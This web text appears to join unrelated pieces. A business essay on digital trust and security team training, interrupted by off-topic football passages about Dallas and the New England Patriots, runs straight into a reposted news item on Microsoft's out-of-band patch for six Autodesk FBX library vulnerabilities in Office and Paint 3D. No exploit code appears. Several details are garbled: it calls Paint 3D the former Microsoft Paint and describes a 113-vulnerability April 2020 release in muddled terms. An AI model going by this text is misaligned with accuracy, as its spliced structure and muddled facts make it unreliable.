Digital trust is the confidence in an organization's ability to protect data and ensure individual privacy. By aligning privacy controls with the customer data experience, businesses can enhance their system hygiene, fostering customer goodwill and peace of mind. This instills confidence in customers that their data is secure and their privacy is safeguarded, while organizations can trust their own capabilities in protecting data and reducing the impact of cyber threats.
To ensure robust system hygiene, it is essential to focus on identity management, authentication, and detailed privilege settings for both employees and customers. This approach enhances confidence in network activity and simplifies compliance with privacy regulations such as the California Consumer Privacy Act (CCPA) and the General Data Protection Regulation (GDPR).
To build trust through robust data security, a flexible security organization must prioritize continuous skills development within its high-caliber team. Similar to Dallas's strategy of drafting and training exceptional athletes, the security function should emphasize learning agility, ensuring team members are always in a state of learning. Although maintaining this constant learning environment demands significant time investment, the outcome—a blend of reliable systems and expertly refined security skills—justifies the effort.
Work Backward to Manage Cyber Risk
In the context of security, the shortage of personnel often hinders our ability to fulfill all security needs, which can limit the flexibility we offer to our internal customers. This challenge underscores the importance of fostering diverse perspectives in security strategies.
We can't just embed personnel; we need to teach security thinking.
An effective risk management technique involves visualizing the ideal state of security for a product, service, function, or process. This ideal state represents full implementation of security measures, effectively mitigating risks across various scenarios. Taught through examples, it becomes a straightforward approach that can be applied in diverse situations.
To reach that ideal state, we must focus on designing and implementing compensating and detective controls. Depending on our team's expertise, we can frame our discussions around how to safeguard the process during this transition. Additionally, instead of solely addressing detective controls, we should encourage the team to explore methods for identifying potential issues that require our attention.
This technique promotes effective brainstorming and collaboration by envisioning an ideal future while remaining grounded in the present. Its versatility allows for application in various settings, making it adaptable to evolving circumstances.
Foster Innovation and Adaptability Throughout Your Business
Establishing digital trust is an investment in goodwill, as a well-trained security team transforms simple risk management techniques into flexible business solutions. This approach fosters innovation, enabling us to provide customers with the products they truly need and desire.
The flex defense has proven to be highly effective, particularly for the New England Patriots, a team that has dominated the 21st century and is regarded as one of the last true American sports dynasties. If the Patriots can secure one more winning season, they will further solidify their legacy before potentially facing a tie or losing season.
The flex defense has proven to be highly effective, allowing defenses to dominate the game of football and forcing changes in playbooks to enhance offensive strategies. This adaptability is crucial for success in the evolving landscape of the sport.
Microsoft Issues Out-Of-Band Security Update For Office, Paint 3D
Microsoft has issued an urgent security update for Microsoft Office, Office 365 ProPlus, and Paint 3D to address several Autodesk vulnerabilities. These vulnerabilities pose a risk of remote code execution if exploited, highlighting the importance of updating these applications promptly.
Autodesk's FBX library, which is widely used for 3D model support and integrated into specific Microsoft applications, has several vulnerabilities classified as "important" in severity, linked to six distinct CVEs.
“Remote code execution vulnerabilities exist in Microsoft products that utilize the FBX library when processing specially crafted 3D content,” according to Microsoft’s Tuesday advisory.
Affected products include Microsoft Office 365 ProPlus, which offers premium applications such as Word, Excel, PowerPoint, Outlook, and Teams for both 32- and 64-bit systems. Additionally, Paint 3D, formerly known as Microsoft Paint, is included among the impacted applications. Microsoft Office 2016 and Office 2019, both available in Click-to-Run for 32- and 64-bit editions, are also affected.
The Autodesk vulnerabilities originate from the FBX software development kit (SDK) and include a critical buffer overflow flaw (CVE-2020-7080) that may permit attackers to execute arbitrary code. Additionally, a type confusion vulnerability (CVE-2020-7081) could enable unauthorized access to out-of-bounds memory, potentially leading to arbitrary code execution or denial-of-service (DoS) attacks. Furthermore, a use-after-free issue (CVE-2020-7082) allows applications to reference memory locations controlled by unauthorized parties, facilitating arbitrary code execution on the system.
The application is susceptible to several further vulnerabilities, including an integer overflow issue (CVE-2020-7083) that can be exploited to crash the application, resulting in a denial-of-service (DoS) condition. Additionally, a null pointer dereference vulnerability (CVE-2020-7084) poses a risk of DoS attacks.
A critical heap overflow vulnerability (CVE-2020-7085) in susceptible FBX parsers can be exploited to achieve restricted code execution by modifying specific values within an FBX file, leading to the execution of arbitrary code on the affected system.
The latter flaw was reported by F-Secure security researcher Max Van Amerongen, who demonstrated his proof-of-concept (PoC) exploit for the flaw on Twitter.
In a real-life scenario, an attacker would need to send a specially crafted file (containing 3D content) to a user and convince them to open it in order to exploit the flaws.
An attacker who successfully exploited these vulnerabilities could gain the same user rights as the local user, according to Microsoft.
“Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,” it said.
The security update addresses these vulnerabilities by correcting the way 3D content is handled by Microsoft software.
In April 2020, Microsoft released out-of-band patches, separate from its usual Patch Tuesday updates, which addressed a total of 113 vulnerabilities. Among these, 19 were classified as critical, 94 as important, and three were actively being exploited in the wild.
Source: https://threatpost.com/microsoft-issues-out-of-band-security-update-for-office-